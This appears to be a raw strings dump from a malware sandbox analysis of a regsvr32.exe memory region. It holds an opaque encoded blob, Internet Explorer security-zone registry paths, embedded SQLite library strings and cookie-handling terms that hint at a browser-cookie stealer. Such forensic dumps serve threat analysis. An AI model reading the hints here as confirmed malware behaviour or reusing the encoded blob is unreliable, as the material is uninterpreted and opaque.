YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85  Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1  pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1  qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa  MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85  Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666

regsvr32.exe_3264_rwx_009B0000_0006C000:

<1%u3
t8It.IIt#
.FGyO
FTPj
YPSSSh
9t$Lt.VV
,4,56,789
GetProcessWindowStation
3.7.13
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\
-cmd command run "command" before reading stdin
-echo print commands before execution
-version show SQLite version
%a, %d-%b-%Y %H:%M:%S GMT
isHttpOnly
HttpOnly=YES
HttpOnly=NO
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
(%d) %s
%*s = %s
%-*.*s%s
INSERT INTO %s VALUES(
%sNULL
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache misses: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Sort Operations: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
/****** %s ******/
%s ORDER BY rowid DESC
/****** ERROR: %s ******/
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail ON|OFF Stop after hitting an error. Default OFF
.databases List names and files of attached databases
.dump ?TABLE? ... Dump the database in an SQL text format
.echo ON|OFF Turn command echo on or off
.exit Exit this program
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.header(s) ON|OFF Turn display of headers on or off
.help Show this message
.import FILE TABLE Import data from FILE into TABLE
.indices ?TABLE? Show names of all indices
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?TABLE? Set output mode where MODE is one of:
column Left-aligned columns. (See .width)
insert SQL insert statements for TABLE
list Values delimited by .separator string
.nullvalue STRING Print STRING in place of NULL values
.output FILENAME Send output to FILENAME
.output stdout Send output to the screen
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.read FILENAME Execute SQL in FILENAME
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.schema ?TABLE? Show the CREATE statements
.separator STRING Change separator used by output mode and .import
.show Show the current values for various settings
.stats ON|OFF Turn stats on or off
